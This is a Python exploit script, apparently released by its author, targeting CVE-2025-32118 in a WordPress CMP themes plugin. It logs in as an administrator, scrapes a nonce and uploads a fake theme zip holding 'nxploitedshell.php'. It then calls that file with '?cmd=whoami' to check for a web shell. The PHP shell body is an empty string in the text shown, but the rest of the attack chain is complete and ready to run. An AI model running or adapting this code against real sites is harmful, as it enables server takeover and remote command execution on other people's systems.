import requests import zipfile import os import argparse from bs4 import BeautifulSoup # Exploit By : Nxploited | Khaled Alenazi, def create_zip(zip_name): theme_dir = "nxploitedshell" os.makedirs(theme_dir, exist_ok=True) with open(os.path.join(theme_dir, "style.css"), "w") as f: f.write("/*\nTheme Name: Nxploited\nDescription: Educational exploit\n*/") with open(os.path.join(theme_dir, "nxploitedshell.php"), "w") as f: f.write("") with zipfile.ZipFile(zip_name, 'w') as zipf: for root, _, files in os.walk(theme_dir): for file in files: full_path = os.path.join(root, file) arcname = os.path.relpath(full_path, os.path.dirname(theme_dir)) zipf.write(full_path, arcname) for file in os.listdir(theme_dir): os.remove(os.path.join(theme_dir, file)) os.rmdir(theme_dir) def login(session, url, username, password, headers): login_url = f"{url}/wp-login.php" data = { "log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In" } response = session.post(login_url, data=data, headers=headers) if any("wordpress_logged_in" in cookie.name for cookie in session.cookies): print("[+] Logged in successfully.") return True print("[-] Login failed.") return False def get_nonce(session, url, headers): target = f"{url}/wp-admin/admin.php?page=cmp-upload-theme" try: response = session.get(target, headers=headers) soup = BeautifulSoup(response.text, 'html.parser') nonce_input = soup.find("input", {"name": "save_options_field"}) if nonce_input: nonce = nonce_input["value"] print(f"[+] Nonce extracted: {nonce}") return nonce except Exception as e: print(f"[-] Failed to extract nonce: {e}") return None def upload_zip(session, url, nonce, headers, zip_path): post_url = f"{url}/wp-admin/admin.php?page=cmp-settings" files = { "fileToUpload": ("Nxploited.zip", open(zip_path, "rb"), "application/zip") } data = { "save_options_field": nonce, "_wp_http_referer": "/wordpress/wp-admin/admin.php?page=cmp-upload-theme", "submit_theme": "Install Theme" } response = session.post(post_url, headers=headers, files=files, data=data) if "was successfully installed" in response.text: print("[+] Exploit uploaded successfully.") return True print("[-] Upload failed.") return False def check_shell(url): shell_url = f"{url}/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=whoami" try: response = requests.get(shell_url, timeout=10) if response.status_code == 200: print(f"[+] Shell is accessible: {shell_url}") print(f"[+] Response: {response.text.strip()}") else: print("[-] Shell not accessible.") except Exception as e: print(f"[-] Target is unreachable or shell failed: {e}") def banner(): print("Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi") def main(): parser = argparse.ArgumentParser(description="Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi") parser.add_argument("-u", "--url", required=True, help="Base URL of WordPress site") parser.add_argument("-un", "--username", required=True, help="Admin username") parser.add_argument("-p", "--password", required=True, help="Admin password") args = parser.parse_args() zip_name = "Nxploited.zip" headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"} session = requests.Session() session.verify = False requests.packages.urllib3.disable_warnings() banner() create_zip(zip_name) if not login(session, args.url, args.username, args.password, headers): return nonce = get_nonce(session, args.url, headers) if not nonce: return if upload_zip(session, args.url, nonce, headers, zip_name): check_shell(args.url) if __name__ == "__main__": main()